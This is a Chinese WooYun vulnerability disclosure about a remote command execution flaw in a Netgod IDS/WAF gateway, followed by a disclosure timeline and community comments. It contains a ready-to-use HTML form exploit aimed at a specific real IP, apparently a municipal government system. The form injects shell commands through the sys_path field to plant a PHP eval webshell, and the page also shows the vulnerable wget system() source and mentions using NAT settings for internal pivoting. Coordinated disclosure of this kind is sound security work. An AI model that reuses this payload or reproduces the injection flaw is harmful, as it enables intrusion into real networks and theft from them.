当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027324

漏洞标题:[再浅谈内网安全]--网神某带ids,waf网关设备完控0day又一枚

相关厂商:网神

漏洞作者: 紫梦芊

提交时间:2013-07-01 11:51

修复时间:2013-09-29 11:51

公开时间:2013-09-29 11:51

漏洞类型:设计不当

危害等级:低

自评Rank:3

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-01: 细节已通知厂商并且等待厂商处理中
2013-07-05: 厂商已经确认,细节仅向厂商公开
2013-07-08: 细节向第三方安全合作伙伴开放
2013-08-29: 细节向核心白帽子及相关领域专家公开
2013-09-08: 细节向普通白帽子公开
2013-09-18: 细节向实习白帽子公开
2013-09-29: 细节向公众公开

简要描述:

之前发布的国内外VPN网关0day包括了网神 现在再爆他们带ids和waf版本远程命令执行的0day一枚
问题很普通。

详细说明:

话不多说直接上0day.

<form action="https://221.202.118.50/admin/ids/waf_update.php" method="post">
<input type="hidden" name="uptype" value="1">
<input type="hidden" name="sys_path" value="http://update.cisco.com/tmp.bin -O /datahttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/__ids_up__.bin || echo '<? eval($_POST[cmd])?>' >/ssl/www/bug2.php ||whoami ">
<input type="submit" name="Submit">
</form>


221.202.118.50 是葫芦岛市绩效考核系统 这个应该是网神VPN最新版本 感觉用户体验还不赖
来看看问题出在哪儿

include_once "management/system.php";
include_once "management/ids.php";
$uptype =1;
if ($_FILES['ids_file'] || isset($_POST["sys_path"])) {
	$uptype = $_POST["uptype"];
	if($_POST["uptype"] == 2){
		$file_size = $_FILES['ids_file']['size'];
		$file_type = $_FILES['ids_file']['type'];	
		$temp_name = $_FILES['ids_file']['tmp_name'];
		$file_name = $_FILES['ids_file']['name'];
		$file_name = str_replace("\\","",$file_name);
		$file_name = str_replace("'","",$file_name);
		$file_name = str_replace(" ","",$file_name);
		$file_path = $CFG_UPLOAD_PATH."__ids_up__.bin";
		//File Name Check
		if ( $file_name == "" ) { 
			echo "Invalid File Name Specified";
			return;
		}
		$result = move_uploaded_file($temp_name, $file_path);
	}else{
		$file_path = "/datahttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/__ids_up__.bin";
		$url = trim($_POST["sys_path"]);
		$url ="http://".$url;
		system("wget -t 3 $url -O $file_path ");	
	}
	$SM = new IDSManager;
	$V = $SM->snort_update($ticket,$file_path);
}


看代码可以看出是能从web上传 也可以从sys_path参数获取到的地址下载 然后进行snort的升级
用system(wget)进行的下载 进行升级钱应该有个ticket判断 这个相当于session或token
还有一要素 management/system.php 和 management/ids.php 是没有在当前目录下的 所以执行0day后出现如此

ws44.jpg


看到这个Fatal error 很多人瞬间放弃 也许他们测试也测过这里 但是 我们的system在31行之前,无影响(这就是脚本语言的好处之一,运维可以说是噩梦之一,呵呵)
菜刀一连

vvv.jpg


还有些泄漏的源码 看来应该不大重要 但是不应该放在web目录下

vvv2.jpg

漏洞证明:

https://221.202.118.50/bug2.php cmd

ddd.jpg


葫芦岛市的用户不少 我在这里抛个砖,引点大家的玉

ws1.jpg


这个...完全只防了正规途径啊..

ws2.jpg


这个...依然

ws3.jpg


这个NAT配置是个很方便的东西 方便对iptables不熟悉的朋友进行内网渗透
PS:其实当前有不少数SOC以及IDS等防御方式不够完善,大多只对正规途径来的用户行为进行了审计防范,一些另类的方式或是不常用的方式并不审计,或审计较弱,还有普遍现象是大量无用信息没有归纳挖掘,网络管理员也懒得看了。

修复方案:

找乌云官方进行乌云众测
(PS:你们竞争对手sinfor也做了众测)

版权声明:转载请注明来源 紫梦芊@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2013-07-05 00:04

厂商回复:

CNVD确认并复现所述情况,同时对于该设备进行分析后,检测发现若干暴露在互联网上的实例,可以初步确认通用性。拟由CNCERT直接联系厂商处置,同时将继续检测互联网上可能涉及政府和重要信息系统部门的事件,后续加强处置。
rank 17

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-01 11:52 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    跪倒

  2. 2013-07-01 12:02 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    0day

  3. 2013-07-01 12:16 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    厉害呀!

  4. 2013-07-01 12:33 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    流弊呀

  5. 2013-07-01 12:48 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    mark

  6. 2013-07-01 13:16 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    流弊

  7. 2013-07-01 13:19 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    流弊

  8. 2013-07-01 13:36 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    流弊 mark 厉害呀!

  9. 2013-07-01 14:18 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    看一楼明真相的群众节奏带起来了,果断关注啊!

  10. 2013-07-01 14:19 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    妹子威武

  11. 2013-07-01 14:47 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    流弊

  12. 2013-07-01 14:49 | 0x2b ( 实习白帽子 | Rank:51 漏洞数:12 )

    流弊

  13. 2013-07-01 15:44 | 0x334 ( 普通白帽子 | Rank:171 漏洞数:35 | 漏洞无影响,已忽略~~~~~~~)

    跪躺~

  14. 2013-07-01 23:39 | 好人 ( 路人 | Rank:13 漏洞数:6 | 多少人曾爱慕你年轻的容颜)

    xxoo

  15. 2013-07-01 23:53 | cncert国家互联网应急中心(乌云厂商)

    开源、闭源,源码审计是王道。

  16. 2013-07-02 08:07 | 菜菜菜菜 ( 路人 | Rank:2 漏洞数:1 | 无)

    org霸道

  17. 2013-07-03 11:30 | 夜不眠 ( 路人 | Rank:15 漏洞数:1 | 早睡早起,方能养生啊)

    还没确认?看来会提前公开了,咩嘿嘿嘿~

  18. 2013-07-10 12:11 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)

    @se55i0n @gainover 是个小问题 只是修复方案独特 各位大牛见笑了.

  19. 2013-08-10 00:24 | wugui ( 路人 | Rank:15 漏洞数:4 | wugui@lcx.cc)

    咩嘿嘿嘿~

  20. 2013-08-14 09:03 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    写的太好了!!!程序猿又偷懒了啊,file_name过滤3项,到sys_path,只除去空格~~~

  21. 2013-08-14 20:18 | GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)

    大牛

  22. 2013-08-18 21:10 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    妹子威武,膜拜

  23. 2013-09-19 07:55 | 在路上 ( 普通白帽子 | Rank:193 漏洞数:13 | 在学习的路上、在成长的路上...)

    是妹子?膜拜 这种是怎么找到的呢

  24. 2013-09-29 13:21 | 心伤的裤子 ( 路人 | Rank:25 漏洞数:2 | 看啥,裤子都掉了还看!)

    lz才是真正的网神呀

  25. 2013-09-29 14:18 | xx123 ( 路人 | Rank:1 漏洞数:1 | 雷锋)

    牛逼啊,厉害厉害

  26. 2013-09-29 14:47 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    看了两遍,真心觉得很赞,,,这会不会是剑心传说中的女喷油呢?

  27. 2013-09-29 23:11 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)

    @在路上 @鬼魅羊羔 这篇没什么技术含量 只是上一篇的延续而已 找到原因是在原漏洞基础上留了进入方式 继续看新的代码实现

  28. 2013-09-30 13:22 | Lee ( 普通白帽子 | Rank:113 漏洞数:24 | wataru@eviloctal.com)

    很多厂商的网络设备都存在很多的漏洞,洞主加油之!

  29. 2013-10-03 19:36 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...)

    支持LZ法0DAY

  30. 2014-04-15 13:27 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @紫梦芊 你的群满了啊

  31. 2014-05-16 10:57 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    dz 求带……

  32. 2014-06-20 01:24 | 红领巾 ( 路人 | Rank:22 漏洞数:4 | 有些漏洞,如果只是从技术层面来说明问题,...)

    居然是妹子